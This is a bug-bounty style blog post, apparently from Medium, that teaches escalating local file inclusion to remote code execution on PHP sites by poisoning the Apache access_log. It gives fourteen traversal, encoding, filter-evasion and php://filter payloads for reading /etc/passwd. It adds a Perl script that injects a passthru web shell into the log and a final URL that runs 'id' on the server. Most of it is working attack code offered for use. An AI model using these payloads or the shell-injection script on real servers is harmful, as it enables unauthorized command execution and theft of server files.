LFI to RCE by injecting access_log
Hello Everyone,
Today i just wanna share a trick from “Local File Inclusion/File Path Traversal to Remote Code Execution” by injecting the access_log, which has a Critical impact.
What is LFI? Local file inclusion is a vulnerability in some of the web applications because the website read files from the server but the developer doesn’t filter the input from the user he trusts them :D.
What is RCE? Remote Code execution this is a bug give the attacker permissions to execute a command on the server.
For example when you search on website you found a Local File Inclusion (LFI) this is good but this issue just give you access to the files in the server just files you will get a cool bounty from it but if it’s a Remote code execution (RCE) it will be awesome Bounty so now every server has a log files this files save any request to the website with the path and User-Agent and sometimes the Referer value we will use this file access.log you just will do some brute force to know the path of this file or any logs file
The following content describes the various methods or a types based on my current knowledge which might be useful when expanding a “LFI”.
[1] Basic LFI Payload :
http://xyz.com/index.php?page=../../../../../../../../../etc/passwd
[2] NullByte Injection:
http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%00
[3] NullByte Injection with URL Encoding:
http://xyz.com/index.php?page=../../../../../../../../../etc/passwd%2500
[4] Simple URL Encoding:
http://xyz.com/index.php?page=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
[5] Double URL Encoding:
http://xyz.com/index.php?page=%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
[6] Base64 Encoded:
http://xyz.com/index.php?page=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
[7] Filter Evasion-1:
http://xyz.com/index.php?page=../\../\../\../\../\../\../\etc/passwd
[8] Filter Evasion-2:
http://xyz.com/index.php?page=..\/..\/..\/..\/..\/..\/..\/etc/passwd
[9] Filter Evasion-3:
http://xyz.com/index.php?page=....//....//....//....//....//etc/passwd
LFI [ PHP wrappers ] Payloads:-
[10] Simple PHP Filter:
http://xyz.com/index.php?page=php://filter/resource=/etc/passwd
[11] PHP ROT-13 Encoded Filter:
http://xyz.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd
[12] PHP Base-64 Encoded Filter:
http://xyz.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
[13] PHP Base-64 Encoded Filter (Case Insensitive):
http://xyz.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=/etc/passwd
[14] PHP Filters (In Terms of Directory Traversal):
http://xyz.com/index.php?page=php://filter/resource=../../../etc/passwd
So, Let’s Start with an Example:
I have a target: “http://xyz.com/index.php?page=aboutus" & it’s vulnerable to LFI/FPT.
Steps to reproduce:-
Step 1: Enter the following URL in the Address bar of the browser:
http://xyz.com/index.php?page=aboutus
Step 2: Append the following Basic LFI payload in the url in “page” parameter:
../../../../../../../../../../../../../../../etc/passwd
Note: Basic LFI payload didn’t worked
Step 3: As basic LFI payload didn't worked. So, we will now try with “NullByte Injection Payload”, as shown below.
../../../../../../../../../../../../../../../etc/passwd%00
It was confirmed that LFI was there. So, now my target was to escalate it to get RCE.
Now the idea was to get access to some file may be log files which could provide some user controller input (in order to run some command) .
Step 4: Now what you have to do is, you have search for log files. To find the log files location you need to find httpd.conf first.
So, on searching or using Automate scan, E.g.Intruder, we have to search for “httpd.conf”.
Here we found the httpd.conf path, E.g. “/etc/httpd/conf/httpd.conf%00”, now paste this in URL in “page” parameter. This is shown in below screenshot.
View source (ctrl+u) for a better view of their httpd.conf.
So I tried reading access logs ,error logs , different location to access them.
Step 5: Now, after some minutes of searching and reading log files, i found something like “access_log”, which i want. So I tried reading that access logs, as shown below.
http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00
Step 6: Now, we have to search for “v0pcr3w” (Web Shell Remote Code Execution) word in “access_log”. In my case their is no word like “v0pcr3w” was found in “access_log”.
So, now we have to inject the “access_log”. So below is the Perl script which is use to inject the access_log Or you can download it here.
#!/usr/bin/perl -w
use IO::Socket::INET;
my $host = $ARGV[0];
my $port = $ARGV[1];
print "*** Injecting $host:$port access log...\n";
my $rce = "<?if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";
$sock = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>"tcp") || die "Cant connect to $host:$port!\n";
print $sock "GET /v0pcr3w ".$rce." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);
print "*** Done!\n\n";
Now the point is, how to inject the script ? so for that, below are the steps to install perl and inject the script in access_log:
- Install the perl in you environment.
- Save the above perl script as “Inject_Log.pl”.
- Now, Run it as “perl Inject_Log.pl <target> 80”, as shown in following screenshot.
Step 7: If the perl script is injected successfully, then Open the access_log again and search for “v0pcr3w”. If the word is there then we’ve successfully injected the access_log. This is shown in below screenshot.
Step 8: Now run below mentioned line to execute command on server
“/home/pro_99/xyz.com/access_log%00&cmd=id” and you’ll see the “id” command executed.
So, Enter the following final URL in the Address bar of the browser & hit enter:
http://xyz.com/index.php?page=../../../../../../../../../../../../../../../home/pro_99/xyz.com/access_log%00&cmd=id
BOOM!…………
Our Command Executed Successfully “GET /v0pcr3w uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin)”. This is shown in below screenshot.
I hope this topic help someone, thank you for reading.
Suggestions are most welcome as always. I will keep posting the Security related findings. If you got anything from it, you can press the clap icon below and ya, don’t forget to follow me on linkedin & twitter as well. See you all next time. :)
References/Good Reads:
2: File Path Traversal and File Inclusions(LFI / RFI)
3: Directory Traversal, File Inclusion, and The Proc File System
7: From Local File Inclusion to Remote Code Execution — Part 1 & 2
8: From Local File Inclusion to Code Execution
9: Upgrade from LFI to RCE via PHP Sessions
10: LFI Cheat Sheet, File Inclusion Payload list, RFI-LFI-payload-list
11: Command Injection Payload list 1 & Command Injection Payload list 2
Happy hacking!
Cheers!